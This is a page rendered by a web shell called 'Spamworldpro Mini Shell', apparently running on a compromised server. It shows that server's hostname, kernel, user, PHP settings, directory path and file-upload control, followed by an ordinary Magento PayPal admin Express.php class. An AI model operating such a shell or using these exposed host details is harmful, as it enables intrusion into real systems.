Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/magento/module-paypal/Model/Adminhtml/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/magento/module-paypal/Model/Adminhtml/Express.php
<?php
/**
 * Copyright © Magento, Inc. All rights reserved.
 * See COPYING.txt for license details.
 */
declare(strict_types=1);

namespace Magento\Paypal\Model\Adminhtml;

use Magento\Checkout\Model\Session;
use Magento\Framework\Api\AttributeValueFactory;
use Magento\Framework\Api\ExtensionAttributesFactory;
use Magento\Framework\App\Config\ScopeConfigInterface;
use Magento\Framework\Data\Collection\AbstractDb;
use Magento\Framework\Exception\LocalizedExceptionFactory;
use Magento\Framework\Model\Context;
use Magento\Framework\Model\ResourceModel\AbstractResource;
use Magento\Framework\Registry;
use Magento\Framework\UrlInterface;
use Magento\Payment\Helper\Data;
use Magento\Payment\Model\Method\Logger;
use Magento\Paypal\Model\CartFactory;
use Magento\Paypal\Model\Express as PaypalExpress;
use Magento\Paypal\Model\ProFactory;
use Magento\Sales\Api\TransactionRepositoryInterface;
use Magento\Sales\Api\Data\OrderInterface;
use Magento\Sales\Model\Order\Payment;
use Magento\Sales\Model\Order\Payment\Transaction;
use Magento\Sales\Model\Order\Payment\State\AuthorizeCommand;
use Magento\Sales\Model\Order\Payment\Transaction\BuilderInterface;
use Magento\Store\Model\StoreManagerInterface;
use Magento\Framework\Exception\LocalizedException;
use Magento\Paypal\Model\Config;
use Magento\Payment\Model\Method\AbstractMethod;

/**
 * Provides ability to make an authorization calls to Paypal API from admin.
 *
 * @SuppressWarnings(PHPMD.CouplingBetweenObjects)
 */
class Express extends PaypalExpress
{
    /**
     * @var AuthorizeCommand
     */
    private $authCommand;

    /**
     * @param Context $context
     * @param Registry $registry
     * @param ExtensionAttributesFactory $extensionFactory
     * @param AttributeValueFactory $customAttributeFactory
     * @param Data $paymentData
     * @param ScopeConfigInterface $scopeConfig
     * @param Logger $logger
     * @param ProFactory $proFactory
     * @param StoreManagerInterface $storeManager
     * @param UrlInterface $urlBuilder
     * @param CartFactory $cartFactory
     * @param Session $checkoutSession
     * @param LocalizedExceptionFactory $exception
     * @param TransactionRepositoryInterface $transactionRepository
     * @param BuilderInterface $transactionBuilder
     * @param AuthorizeCommand $authCommand
     * @param AbstractResource $resource
     * @param AbstractDb $resourceCollection
     * @param array $data
     * @SuppressWarnings(PHPMD.ExcessiveParameterList)
     */
    public function __construct(
        Context $context,
        Registry $registry,
        ExtensionAttributesFactory $extensionFactory,
        AttributeValueFactory $customAttributeFactory,
        Data $paymentData,
        ScopeConfigInterface $scopeConfig,
        Logger $logger,
        ProFactory $proFactory,
        StoreManagerInterface $storeManager,
        UrlInterface $urlBuilder,
        CartFactory $cartFactory,
        Session $checkoutSession,
        LocalizedExceptionFactory $exception,
        TransactionRepositoryInterface $transactionRepository,
        BuilderInterface $transactionBuilder,
        AuthorizeCommand $authCommand,
        AbstractResource $resource = null,
        AbstractDb $resourceCollection = null,
        $data = []
    ) {
        $this->authCommand = $authCommand;

        parent::__construct(
            $context,
            $registry,
            $extensionFactory,
            $customAttributeFactory,
            $paymentData,
            $scopeConfig,
            $logger,
            $proFactory,
            $storeManager,
            $urlBuilder,
            $cartFactory,
            $checkoutSession,
            $exception,
            $transactionRepository,
            $transactionBuilder,
            $resource,
            $resourceCollection,
            $data
        );
    }

    /**
     * Creates an authorization of requested amount.
     *
     * @param OrderInterface $order
     * @return $this
     * @throws LocalizedException
     */
    public function authorizeOrder(OrderInterface $order)
    {
        $baseTotalDue = $order->getBaseTotalDue();

        /** @var $payment Payment */
        $payment = $order->getPayment();
        if (!$payment || !$this->isOrderAuthorizationAllowed($payment)) {
            throw new LocalizedException(__('Authorization is not allowed.'));
        }

        $orderTransaction = $this->getOrderTransaction($payment);

        $api = $this->_callDoAuthorize($baseTotalDue, $payment, $orderTransaction->getTxnId());
        $this->_pro->importPaymentInfo($api, $payment);

        $payment->resetTransactionAdditionalInfo()
            ->setIsTransactionClosed(false)
            ->setTransactionId($api->getTransactionId())
            ->setParentTransactionId($orderTransaction->getTxnId());

        $transaction = $payment->addTransaction(Transaction::TYPE_AUTH, null, true);
        $message = $this->authCommand->execute($payment, $baseTotalDue, $payment->getOrder());
        $message = $payment->prependMessage($message);

        $payment->addTransactionCommentsToOrder($transaction, $message);
        $payment->setAmountAuthorized($order->getTotalDue());
        $payment->setBaseAmountAuthorized($baseTotalDue);

        return $this;
    }

    /**
     * Checks if payment has authorization transactions.
     *
     * @param Payment $payment
     * @return bool
     */
    private function hasAuthorization(Payment $payment): bool
    {
        return (bool) ($payment->getAmountAuthorized() ?? 0);
    }

    /**
     * Checks if payment authorization allowed.
     *
     * @param Payment $payment
     * @return bool
     * @throws LocalizedException
     */
    public function isOrderAuthorizationAllowed(Payment $payment): bool
    {
        if ($payment->getMethod() === Config::METHOD_EXPRESS &&
            $payment->getMethodInstance()->getConfigPaymentAction() === AbstractMethod::ACTION_ORDER
        ) {
            return !$this->hasAuthorization($payment);
        }

        return false;
    }
}

Spamworldpro Mini